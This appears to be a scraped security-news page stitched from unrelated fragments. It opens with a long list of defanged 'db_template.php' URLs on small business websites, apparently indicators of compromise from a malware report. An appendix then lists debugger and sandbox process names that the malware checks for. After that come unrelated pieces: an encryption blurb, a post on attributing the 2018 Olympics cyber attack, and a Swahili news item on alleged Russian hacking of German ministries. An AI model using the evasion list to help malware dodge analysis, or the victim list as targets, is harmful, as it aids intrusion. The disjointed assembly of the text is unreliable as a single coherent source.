hxxp://anuragcreatives[.]com//db_template.php

hxxp://embali[.]co.za//db_template.php

hxxp://albertaedmonton[.]com/widgetstyles/db_template.php

hxxp://altosdefontana[.]com//db_template.php

hxxp://airfanhydro[.]net//db_template.php

hxxps://www.alexponcet[.]com/wp-includes/db_template.php

hxxp://agropecuariavilarica[.]com.br//db_template.php

hxxps://www.amazingbuyrd[.]com/admin/db_template.php

hxxp://cdxtrading[.]co.za//db_template.php

hxxp://interafricaconsulting[.]com/wpimages/db_template.php

hxxp://glgroup[.]co.za/images/db_template.php

hxxp://hisandherskennels[.]co.za/php/db_template.php

hxxp://alemaohost[.]com/lotosorg[.]com/db_template.php

hxxp://isibaniedu[.]co.za/admin/db_template.php

hxxp://dianakleyn[.]co.za/layouts/db_template.php

hxxp://themotoringcalendar[.]co.za//db_template.php

hxxp://www.loansonhomes[.]co.za//db_template.php

hxxp://edgesecurity[.]co.za/js/db_template.php

hxxp://highschoolsuperstar[.]co.za/files/db_template.php

hxxp://www.ambientproperty[.]com//db_template.php

hxxp://animationshowreel[.]co.il//db_template.php

hxxp://cafawelding[.]co.za/font-awesome/db_template.php

hxxp://apalawyers.pt//db_template.php

hxxp://www.edesignz[.]co.za//db_template.php

hxxp://centuryacademy[.]co.za/css/db_template.php

hxxps://ambyenta.hr//db_template.php

hxxp://ceramica[.]co.za//db_template.php

hxxp://www.alfredoposada[.]com//db_template.php

hxxp://anastasovsworkshop[.]com/wp-includes/db_template.php

hxxp://allisonplumbing[.]com/wp-includes/db_template.php

hxxp://eastrandmotorlab[.]co.za/fleet/db_template.php

hxxp://angelsongroup[.]com/wp-includes/db_template.php

hxxp://www.mikimaths[.]com//db_template.php

hxxp://hjb-racing[.]co.za/htdocs/db_template.php

hxxp://anotherpartofme[.]com/wp-includes/db_template.php

hxxp://www.andreabelfi[.]com//db_template.php

hxxp://www.iancullen[.]co.za//db_template.php

hxxp://alaskamaterials[.]com//db_template.php

hxxp://jeanetteproperties[.]co.za//db_template.php

hxxp://www.digitalmedia[.]co.za//db_template.php

hxxp://www.rejoicetheatre[.]com//db_template.php

hxxps://alterwebhost[.]com//db_template.php

hxxp://bc-u[.]co[.]uk//db_template.php

hxxp://dpscdgkhan.edu[.]pk/shopping/db_template.php

hxxp://edgeforensic[.]co.za//db_template.php

hxxp://willpowerpos[.]co.za//db_template.php

hxxp://antrismode[.]com/wp-includes/db_template.php

hxxp://colenesphotography[.]co.za/modules/db_template.php

hxxp://anthaigroup.vn//db_template.php

hxxps://alphainvestors[.]com.au//db_template.php

hxxps://aliart[.]nl//db_template.php

hxxps://allmantravel[.]com/thumbs/db_template.php

hxxp://fbrvolume[.]co.za//db_template.php

hxxp://amordegato[.]es/storefront/db_template.php

hxxp://agylub[.]com//db_template.php

hxxp://www.khotsonglodge.co.ls//db_template.php

hxxp://ampli5yd[.]com//db_template.php

hxxps://animeok[.]co.il//db_template.php

hxxps://arbeidsrechtcentrum[.]nl//db_template.php

hxxp://erniecommunications[.]co.za/js/db_template.php

hxxp://promechtransport[.]co.za/scripts/db_template.php

hxxp://centuriongsd[.]co.za//db_template.php

hxxp://www.agencesylvieleclerc[.]com//db_template.php

hxxp://delcom[.]co.za//db_template.php

hxxps://aleoestudio[.]com/gallonature/db_template.php

hxxp://oftheearthphotography[.]com/www/db_template.php

hxxp://h-dubepromotions[.]co.za//db_template.php

hxxp://www.alessioborzuola[.]com/downloads/db_template.php

hxxp://crystaltidings[.]co.za//db_template.php

hxxp://funeralbusinesssolution[.]com/email_template/db_template.php

hxxp://funisalodge[.]co.za/data1/db_template.php

hxxp://experttutors[.]co.za//db_template.php

hxxps://www[.]cartridgecave[.]co.za//db_template.php

hxxp://ecs-consult[.]com//db_template.php

hxxp://www.animationinisrael[.]org/tmp_images/db_template.php

hxxp://gideonitesprojects[.]com//db_template.php

hxxp://hybridauto[.]co.za/photography/db_template.php

hxxp://africanpixels.zar.cc//db_template.php

hxxp://ryanchristiefurniture[.]co.za//db_template.php

hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/db_template.php

hxxp://almeriahotelja[.]com/dk/db_template.php

hxxp://al3abflash[.]biz//db_template.php

hxxp://www.fun4kidz[.]co.za//db_template.php

hxxp://alsharhanstore[.]com//db_template.php

hxxp://www[.]infratechconsulting[.]com//db_template.php

hxxp://algihad[.]com/assets/db_template.php

hxxp://americanwestmedia[.]com//db_template.php

hxxp://charliewestsecurity[.]co.za//db_template.php

hxxp://beehiveholdingszar[.]co.za//db_template.php

hxxp://analyticalfootball[.]com//db_template.php

hxxp://apiiination[.]com/leadership/db_template.php

hxxps://ahelicoptermom[.]com/wp-includes/db_template.php

hxxp://servicebox[.]co.za//db_template.php

hxxp://globalelectricalandconstruction[.]co.za/wpscripts/db_template.php

hxxps://aquo[.]in//db_template.php

hxxps://www.alfransia[.]com/wp-admin/db_template.php

hxxp://www.icsswaziland[.]com//db_template.php

hxxp://aiko.pro//db_template.php

hxxps://alceharfield[.]com//db_template.php

hxxp://indocraft[.]co.za/test/db_template.php

hxxp://allegiancesecurity[.]org//db_template.php

hxxp://sullivanprimary[.]co.za//db_template.php

hxxp://www.apmequestrian[.]com//db_template.php

hxxps://alphawaves[.]org/wp-admin/db_template.php

hxxp://www.alexandrasternin[.]com/illustration/db_template.php

hxxp://www.daleth[.]co.za//db_template.php

hxxp://jwseshowe[.]co.za/assets/db_template.php

hxxp://winagainstebola[.]com//db_template.php

hxxp://anubandh[.]in//db_template.php

hxxp://www.alexanderhomestead[.]com//db_template.php

hxxp://alfatek-intelligence[.]com//db_template.php

hxxp://www.aprendiendoencasa[.]com/wp-includes/db_template.php

hxxp://alorabrownies[.]com/wp-admin/db_template.php

hxxp://andrasadam[.]com/tothildiko/wp-includes/db_template.php

hxxp://cazochem[.]co.za/cazochem/db_template.php

hxxp://debnoch[.]com/image/db_template.php

hxxp://hmholdings360[.]co.za//db_template.php

hxxp://iinvest4u[.]co.za//db_template.php

hxxp://burgercoetzeeattorneys[.]co.za//db_template.php

hxxp://anngrigphoto[.]com//db_template.php

hxxp://alchemistasonida[.]com//db_template.php

hxxp://anahera[.]biz/admin/db_template.php

hxxp://h-u-i[.]co.za/heiren/db_template.php

hxxp://insta-art[.]co.za//db_template.php

hxxp://muallematsela[.]com//db_template.php

hxxp://aguasdecastilla[.]com/uploads/db_template.php

hxxp://www.arabgamenetwork[.]com//db_template.php

hxxps://arhiepiscopiabucurestilor[.]ro/templates/db_template.php

hxxp://amruthavana[.]com/blog/db_template.php

hxxp://digitalblue[.]co.za//db_template.php

hxxps://www.alvarezarquitectos[.]com//db_template.php

hxxp://buboobioinnovations[.]co.za/wpimages/db_template.php

hxxp://andrewsbisom[.]com//db_template.php

hxxp://www.m-3[.]co.za//db_template.php

hxxp://beesrenovations[.]co.za/images/db_template.php

hxxps://www.apliety[.]co.il/wp-includes/db_template.php

hxxp://alchamelup[.]org/htdocs/db_template.php

hxxp://benonicoc[.]co.za/resources/db_template.php

hxxps://al-mostakbl[.]com//db_template.php

hxxp://alchimiegrafiche[.]net/bbdelteatro/db_template.php

hxxp://andrespazsoldan[.]com//db_template.php

hxxp://in2accounting[.]co.za//db_template.php

hxxp://aipa[.]ca//db_template.php

hxxp://alphabee.fund/PHPMailer_5.2.0/db_template.php

hxxp://arabsdeals[.]com//db_template.php

hxxps://archiotronic[.]com/wp-includes/db_template.php

hxxp://capewindstrading[.]co.za//db_template.php

hxxps://althurayaa[.]com//db_template.php

hxxp://jhphotoedits[.]co.za//db_template.php

hxxp://cloudhub.co.ls/modules/db_template.php

hxxp://apironco[.]com/wp-includes/db_template.php

hxxp://digital-cameras-south-africa[.]co.za/script/db_template.php

hxxp://ahmadhasanat[.]com//db_template.php

hxxp://alexrocchi[.]com//db_template.php

hxxp://aljaadi[.]com//db_template.php

hxxps://www.engeltjieakademie[.]co.za//db_template.php

hxxp://annabelle[.]nl/next/db_template.php

hxxp://juniorad[.]co.za/vendor/db_template.php

hxxp://animationpulse[.]net//db_template.php

hxxp://angloglot[.]com//db_template.php

hxxp://agricolavicuna.cl//db_template.php

hxxp://alexelgy[.]com/allaccess/db_template.php

hxxp://www.centreforgovernance[.]uk//db_template.php

hxxp://www.aliandconsulting[.]com//db_template.php

hxxp://balaateen[.]co.za/less/db_template.php

hxxp://aleksicdunja[.]com//db_template.php

hxxp://arestihome[.]com//db_template.php

hxxp://am1int.fcomet[.]com/wp1/db_template.php

hxxp://anet-international-group[.]com/shop/db_template.php

hxxp://courtesydriving[.]co.za/js/db_template.php

hxxp://annaplebanek[.]com//db_template.php

hxxp://agencijazemil[.]com//db_template.php

hxxp://airminumtiro[.]com//db_template.php

hxxp://www.androidwikihow[.]com//db_template.php

hxxp://alisabyfinna[.]com//db_template.php

hxxp://rma-law[.]co.za//db_template.php

hxxp://amari[.]ro/components/db_template.php

hxxp://anxiousandunstoppable[.]com//db_template.php

hxxp://www.buhlebayoacademy[.]com//db_template.php

hxxp://arabellajo[.]com/wp/wp-includes/db_template.php

hxxp://blackthorn[.]co.za//db_template.php

hxxp://alaqaba[.]com/dnsarabia[.]com/db_template.php

hxxp://airesis.blog/wp-admin/db_template.php

hxxp://www.aptibet[.]org//db_template.php

hxxp://alecattic[.]com/wp-includes/db_template.php

hxxp://anglero[.]com//db_template.php

hxxp://getabletravel[.]co.za/wpscripts/db_template.php

hxxp://www.allwestdental[.]com/wp-includes/db_template.php

hxxp://printernet[.]co.za//db_template.php

hxxp://genesisbs[.]co.za//db_template.php

hxxp://allsporthealthandfitness[.]com//db_template.php

hxxp://www.humorcarbons[.]com//db_template.php

hxxp://intelligentprotection[.]co.za//db_template.php

hxxp://amazethings[.]com//db_template.php

hxxp://incoso[.]co.za/images/db_template.php

hxxp://www.antoanetapalikarska[.]com//db_template.php

hxxps://www.alteaparadise[.]com/wp-includes/db_template.php

hxxp://amirmenahem[.]com//db_template.php

hxxp://isound[.]co.za//db_template.php

hxxp://www.alestilorachel[.]com//db_template.php

hxxp://alcfm[.]net/wp-admin/db_template.php

hxxp://www.acer-parts[.]co.za//db_template.php

hxxp://www.gsmmid[.]com//db_template.php

hxxp://skhaleni[.]co.za//db_template.php

hxxps://amiici.vision//db_template.php

hxxps://andihaas[.]at/wp-includes/db_template.php

hxxp://www.albertaprimebeef[.]com//db_template.php

hxxps://www.appster[.]it/wp-includes/db_template.php

hxxp://amofoundation[.]org/wp-includes/db_template.php

hxxp://iqra[.]co.za/pub/db_template.php

hxxp://thecompasssolutions[.]co.za//db_template.php

hxxp://archwaycarpetscrm[.]co[.]uk//db_template.php

hxxp://iggleconsulting[.]com//db_template.php

hxxps://angel-blanco[.]net/wp-includes/db_template.php

hxxps://anotherdayinparadise[.]ca//db_template.php

hxxp://www.bitp[.]co.za//db_template.php

hxxp://cupboardcure[.]co.za/vendor/db_template.php

hxxp://all2wedding[.]com/wp-includes/db_template.php

hxxp://allianz[.]com.pe/wp-admin/db_template.php

hxxp://amiehepperlin[.]com//db_template.php

hxxps://www.amighini[.]it/webservice/db_template.php

hxxp://broken-arrow[.]co.za//db_template.php

hxxp://www.ihlosiqs-pm[.]co.za//db_template.php

hxxp://alisimple[.]si/wp-includes/db_template.php

hxxp://allthat[.]social//db_template.php

hxxp://www.amphibiblechurch[.]com//db_template.php

hxxp://bestencouragementwords[.]com//db_template.php

hxxp://alayhamtechnologies[.]com//db_template.php

hxxps://alaskanharvestseafood[.]com/backup/db_template.php

hxxps://www.air-mag[.]ro//db_template.php

hxxp://get-paid-for-online-survey[.]com//db_template.php

hxxp://www.antc[.]ch/wp-includes/db_template.php

hxxp://firstchoiceproperties[.]co.za//db_template.php

hxxp://habibtextiles[.]pk//db_template.php

hxxp://fsproperties[.]co.za/engine1/db_template.php

hxxp://diegemmerkat[.]co.za//db_template.php

hxxp://molepetravel.co.ls//db_template.php

hxxp://mmetl[.]co.za//db_template.php

hxxp://altrablog[.]com//db_template.php

hxxp://abrahamseed[.]co.za//db_template.php

hxxp://www.amerindgen[.]com/author/admin1/db_template.php

hxxp://altcoinaddict[.]com//db_template.php

hxxp://iiee.edu[.]pk//db_template.php

hxxp://cmhts[.]co.za/resources/db_template.php

hxxp://domesticguardians[.]co.za/Banner/db_template.php

hxxps://amishcountryfurnishings[.]com//db_template.php

hxxps://allday[.]gr//db_template.php

hxxp://www.alinn-u-yin[.]com//db_template.php

hxxps://www.allin-chain[.]com//db_template.php

hxxps://www.anatapackaging[.]com/vendors/db_template.php

hxxp://alexcelts[.]com/wp/db_template.php

hxxp://www.allstylus[.]com.br//db_template.php

hxxp://www.algom-law[.]com//db_template.php

hxxp://ambiances-toiles[.]fr//db_template.php

Appendix

Security Tools Checked on the Machine

win32_remote

win64_remote64

ollydbg

ProcessHacker

tcpview

autoruns

autorunsc

filemon

procmon

regmon

procexp

idaq

idaq64

ImmunityDebugger

Wireshark

dumpcap

HookExplorer

ImportREC

PETools

LordPE

dumpcap

SysInspector

proc_analyzer

sysAnalyzer

sniff_hit

windbg

joeboxcontrol

joeboxserver

How to evaluate and select the best encryption services


Encryption is necessary after all, so the only discussions about this technology and these services should be about choosing a solution.

When to comes to truly protecting data, encryption is a no-brainer. In fact, some industry regulations require that businesses and associations encrypt specific information. Health care is a great example of this, but organizations in all sectors have a responsibility to protect their customer and client information, whether it's personally identifiable information or an email between colleagues.

Winter Olympics Cyber Attack Signs Point to Russia – So Why the False-Flag?

 

A cyber attack disrupted the recent opening Olympic Games ceremonies, which was confirmed by a spokesman for the Pyeongchang Organizing Committee.  The disruption took out Internet access and telecasts of non-critical machines, grounded broadcasters’ drones, shut down the Pyeongchang 2018 website, and prevented spectators from printing out reservations and attending the ceremony.

 

Per reports, the attackers gained access to approximately 300 computers, hacked routers, and distributed malware in the lead-up and during the event’s ceremonies.  Initial findings by at least one computer security company concluded that the attack had started a year in advance.  The attackers could have destroyed computers, according to the company’s researchers, but had restrained themselves, erasing only the backup files on Windows machines.  Conclusions were made that the attack was an attempt to send a political message.  As of this writing, the initial vector of attack has not been determined or at least not made public, although speculation is that prior access was gained and used to launch this attack.

 

According to one news source citing U.S. intelligence officials, Russian spies were behind the cyber attack with the purpose of retaliating for the Olympics suspension of Russia being allowed to compete in the games due to a doping scandal.  Of note, these officials believe that the attack was intended to be a “false-flag” operation as the attackers are alleged to have used North Korean IP addresses and other “tactics” to make it appear like North Korea was behind the attacks.  No evidence has been produced thus far by the government as it had done when supporting its claims of North Korea’s culpability in the Sony hack.

 

While there may very well be classified information that helps attribute this activity, motivation is largely the incriminating bit of evidence that points to Russian culpability.  Paying back the International Olympic Committee (IOC) for not allowing Russian athletes to compete under the national flag would be consistent with fervent Russian nationalism and its need to protect all aspects of its cultural identity.  Russian state or state-affiliated actors are alleged to have orchestrated previous cyber attacks against Olympic targets, notably the 2016 cyber attack against the World Anti-Doping Agency in which the attackers gained access to athlete data, including confidential medical data, and made it public.

 

If the motive is going to be the primary factor in attribution (note, malware analysis provided no clues incorporating traits of malware used by a variety of suspected state actors), at the time of the attack, only two governments were probable suspects – North Korea and Russia.  However, after tumultuous events over nuclear weapon development and missile firing, North Korea made grand diplomatic overtures to South Korea and ultimately marched with it under one flag.  It would seem improbable that it would want to detract from headway made via its Olympic diplomacy with a nuisance attack.

Still stinging from its inability to walk under its flag, Russia seems like the probable suspect behind the cyber attack, wanting to express its dissatisfaction toward the IOC.  If true, the fact that it could have and didn’t is testament that Russia wanted to register displeasure, not punish South Korea for the IOC’s decision.

 

However, what gives pause is the reason why – if reporting stands correct – that state actors of the Russian government were needed to conduct a false-flag attack to simply demonstrate its discontent with the IOC.  Simply, a false-flag operation is where an attacker tries to make their actions look as if it was the work of another known attacker.  In cyberspace such an endeavor is simple to achieve especially when the tactics, techniques, and procedures (TTP) that often include methods of operations, malware, command-and-control architecture are published for global consumption as Indicators of Compromise.  In this instance, the attack blended TTPs and the digital fingerprints of threat actors connected to North Korea, China, and Russia.

Cyber proxies such as non-state hacker groups are perfect agents for states wanting to send a signal to a government without committing its own resources.  There is a level – albeit shallow – of plausible deniability that an aggressor state can claim and still intimate to the victim of its tacit involvement in the attack.  Russia has at its disposal a capable cyber criminal underground, as well as nationalistic youth groups that could have achieved a similar effect.  This was evidenced in 2007 when one such group claimed responsibility for the cyber attacks against Estonia for the removal of a Soviet war memorial.

The use of state actors to commit a cyber equivalent of a tantrum raises eyebrows.  According to one source, the Russian state hackers behind this attack were the same that have been engaged in cyber attack against Ukraine.  Making a public statement doesn’t seem the type of operation an elite unit would be called upon to execute.

 

So why the false-flag?  There are a few possibilities.  One, Russia wanted to test using the TTPs of other nations in an operation to gauge how defenders would determine their findings.  Two, Russia may have “signaled” to nations like the United States – and those private sector companies following their alleged activities – that it would be implementing false-flags in future operations, essentially making technical indicators and digital and technical analysis for attribution, useless.  Three, maybe the Cyber attack achieved another objective in addition to expressing its anger.  Did another attack, perhaps more surreptitious, occur simultaneously against another target while all eyes were focused on this?

Russia’s cyber operations (including cyber attacks) have been described from anything from being sloppy to being among the most advanced actors in the world.  Perhaps the question that should be asked is why did Russia want a “false flag” operation to be so easily attributed?

Perhaps the answer lies with the simplest answer: that it was just the easiest path to take.  And in a world where there is no international consensus of state behavior in cyberspace, the landscape favors the attackers until the defenders figure out how to respond to them with enough conviction to alter attacker behavior.   No one looks to have that answer.

This is a guest post written by Emilio Iasiello

The post Winter Olympics Cyber Attack Signs Point to Russia – So Why the False-Flag? appeared first on cyberdb.co.

The Myth of “Staying One Step Ahead of the Hackers”

 

The assumption that software security can stay ahead of the hackers is not true because the software security industry is always reacting to threats that hackers expose. Once hackers start exploiting a flaw in an application, security companies try to block the resulting threat by providing security updates for existing software or by developing new programs. Either way, hackers will be one step ahead because the software security industry can’t predict what new threats the hackers will unleash.

URUSI YAKANA KUISHAMBULIA KIMTANDAO UJERUMANI



KWA UFUPI: Mifumo ya kimtandao katika baadhi ya wizara za serikali ya Ujerumani ilikumbwa na udukuzi uliopelekea kuibiwa kwa taarifa kadhaa huku baadhi ya vyombo vya habari vimeishutumu Urusi dhidi ya shambulizi hilo la kimtandao. Nae waziri wa Ujerumani wa maswala ya uchumi akieleza hawana uhakika kua Urusi imehusika na shambulizi hilo. Aidha, Urusi  imekana kuhusika na shambulizi hilo.
------------------------------------------

Mataifa makubwa yenye uwezo wa kimtandao yamekua yakishutumiana panapo tokea mashambulizi mtandao kwenye mataifa hayo. Urusi, Uchina na Korea ya Kaskazini wamekua wakishtumiwa Zaidi na mataifa ya Ulaya na marekani.

---------------------
TAARIFA: Tume ya TEHAMA ya nchini Tanzania imekaa kikao chake cha kwanza mahsusi kujadili maswala ya usalama mtandao Nchini ambapo mengi yalipata kuangaziwa na lengo kuu limekua ni kuhakiki tunapata taifa salama kimtandao.
---------------------

Ujerumani Hivi karibuni imekumbwa na shambulizi mtandao katika wizara zake mbili hadi sasa ambao umepelekea taarifa kadhaa za wizara hizo kupotelea mikononi mwa wahalifu mtandao.


Wabunge wa Ujerumani wametupia lawama serikali kwa kutokuwaambia kuhusu mashambulizi hayo ya mtandaoni huku kamati ya masuala ya dijitali ya bunge la Ujerumani ikiketi kwa dharura kwa madhumuni ya kuipitia taarifa juu ya udukuzi huo ulio gundulika Mwishoni mwa mwezi Februari mwaka huu wa 2018.

Mmoja wa wajumbe wa kamati ya digitali – Anke Domscheit-Berg, kutokea chama cha mrengo wa kushoto, Die Linke ame eleza ya kua serikali ya ujerumani ilipaswa kujua mashambulizi hayo ya kimtandao mapema na kuyadhibiti.



Shirika la habari la Ujerumani, DPA, lilivinukuu vyanzo vya usalama ambavyo havikutajwa majina vikisema kwamba kundi la APT28 la Urusi lilidukuwa mifumo ya mawasiliano ya wizara za mambo ya nje na ndani za Ujerumani na kufanikiwa kuiba taarifa.

Shirika hilo linasema kuwa mashambulizi hayo yaligunduliwa mwezi Disemba mwaka jana na inawezekana yalikuwa yakiendelea kwa mwaka mzima.

Thomas de Maiziere.
Waziri wa Mambo ya Ndani wa Ujerumani
Kufuatia ripoti hiyo, wizara ya mambo ya ndani ilithibitisha kudukuliwa kwa kompyuta za serikali kuu ya shirikisho, ikisema kuwa mashambulizi hayo yalifanyika kwenye masuala yasiyohusiana na siri za serikali na kwamba yalidhibitiwa.

Hata hivyo, msemaji wa wizara hiyo hakuweza kutoa undani zaidi wa suala hili, akisema limo kwenye uchunguzi na kwamba hatua za kiusalama zinaendelea kuchukuliwa.

Lakini kwa mujibu wa vyombo vya habari vya Ujerumani, udukuzi uliachiwa kuendelea hadi Februari 28 ya mwaka huu wa 2018 ili wachunguzi wakusanye taarifa kuhusiana na upana, malengo na watendani wenyewe.

"Ikithibitika kuwa ni kweli, hivi vitakuwa ni aina ya vita dhidi ya Ujerumani," alisema mkuu wa kamati ya masuala ya dijitali ya bunge la Ujerumani, Dieter Janacek, kutoka chama cha walinzi wa mazigira, Die Grüne, kwa mujibu wa gazeti la Berliner Zeitung.
Janacek aliyataja mashambulizi hayo kubwa ni mabaya kabisa, na ametoa wito kwa serikali kuzifikisha taarifa zote ilizonazo bungeni.

Vikao vya kwanza vya Usalama Mtandao vilivyo andaliwa na Tume ya TEHAMA Nchini Tanzania 

Alipoulizwa endapo mashambulizi hayo yalifanywa na kundi linaloungwa mkono na Urusi, mbunge kutokea muungano wa CDU/CSU wa Kansela Angela Merkel, aliutetea mkakati wa serikali kuzuia taarifa. Stephan Mayer kutoka chama cha CSU alisema "uchunguzi kamili na wa kina" ulikuwa unahitajika "lakini sio wa kuwekwa hadharani." Mbunge huyo aliongeza kuwa "kuwadhania vibaya wengine hakuwezi kuusaidia uchunguzi huo".

Kundi la APT28 au wakati mwengine huitwa Fancy Bear, ambalo linahusishwa na idara ya ujasusi kwenye jeshi la Urusi, limewahi kutajwa kuhusika na mashambulizi  ya mtandaoni dhidi ya Bunge la Ujerumani mwaka 2015 na pia ofisi za Jumuiya ya Kujihami ya NATO na serikali za mashariki mwa Ulaya.

Brigitte Zypries
Waziri wa Nishati na Uchumi
Ujerumani.
Tayari waziri wa nishati na uchumi wa Ujerumani Mh. Brigitte Zypries amezungumzia shambulizi hili na kueleza yakua hakuna Ushahidi unaothibitisha ya kua Urusi ndio imehusika.

Aidha, Urusi nayo imekana kuhusika na shambulizi hilo.